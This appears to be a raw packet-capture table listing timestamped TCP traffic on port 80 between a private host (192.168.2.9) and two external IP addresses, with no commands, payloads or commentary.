                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671017885 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671025038 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671025991 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671030998 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671044111 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671046972 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671047926 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671056986 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671066046 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671067953 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671073914 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671081066 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671086073 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671097040 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671097994 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671098948 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671104908 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671111107 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671114922 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671118975 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671120882 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671127081 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671133995 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671139956 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671145916 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671147108 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671147108 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671169996 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671170950 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671191931 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671195984 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671201944 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671212912 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671216011 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671221972 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671228886 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671240091 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671241045 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671247959 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671253920 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671262026 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671283960 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671303034 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671451092 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671490908 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671499014 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671504974 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671550989 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671565056 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671577930 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671613932 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671650887 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671657085 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671668053 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671700954 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671730995 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671766996 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671772957 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671783924 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671788931 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671796083 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671802044 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671808958 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671812057 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671817064 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671823978 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671834946 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671875000 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671875954 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671897888 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671911001 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671924114 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671928883 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671941996 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671952963 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671957016 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671963930 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671973944 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671973944 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671982050 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671987057 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671988964 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.671993971 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672002077 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672009945 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672024012 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672032118 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672038078 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672048092 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672049046 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672056913 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672064066 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672068119 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672086954 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672105074 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672117949 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672182083 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672188044 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672228098 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672297001 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672307014 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672318935 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672324896 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672332048 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672338963 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672358036 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672375917 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672486067 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672492981 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672506094 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672511101 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672517061 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672522068 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672529936 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672540903 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672548056 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672564030 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672565937 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672575951 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672580957 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672583103 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672588110 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672595024 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672610998 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672616005 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672619104 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672630072 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672633886 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672641993 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672662973 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672672987 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672679901 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672686100 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672697067 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672712088 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672732115 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672761917 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672769070 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672780037 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672785997 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672810078 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672823906 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672831059 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672842026 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672848940 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672854900 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672868967 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.672890902 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673257113 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673264027 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673274994 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673315048 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673321962 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673329115 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673341036 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673346996 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673355103 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673368931 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673388004 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.673399925 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.681965113 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.681989908 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.681997061 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682003021 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682010889 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682018042 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682024956 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682044983 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682053089 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682059050 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682066917 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682091951 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682100058 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682111025 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682111025 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682112932 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682148933 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682180882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682188988 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682209015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682215929 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682244062 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682257891 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682274103 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682281017 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682293892 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682321072 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682327032 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682332993 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682333946 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682354927 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682405949 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682426929 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682432890 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682446003 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682451010 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682456970 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682463884 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682463884 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682471037 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682477951 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682535887 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682535887 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682596922 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682605028 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682611942 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682640076 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682657957 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682676077 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682691097 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682703972 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682709932 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682718992 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682739973 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682759047 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682769060 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682802916 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682810068 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682821989 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682827950 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682833910 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682846069 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682852030 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682852030 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682873964 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682889938 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682904005 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682931900 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682990074 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.682996988 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683011055 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683017969 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683038950 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683054924 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683104038 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683226109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683233023 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683244944 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683249950 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683264017 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683279037 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683279991 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683285952 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683293104 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683298111 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683298111 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683306932 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683319092 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683317900 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683329105 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683352947 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683367968 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683402061 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683418036 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683425903 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683432102 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683437109 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683449984 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683456898 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683464050 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683469057 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683475018 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683480024 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683480978 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683480024 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683490992 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.683506966 CEST4970980192.168.2.9147.45.44.104
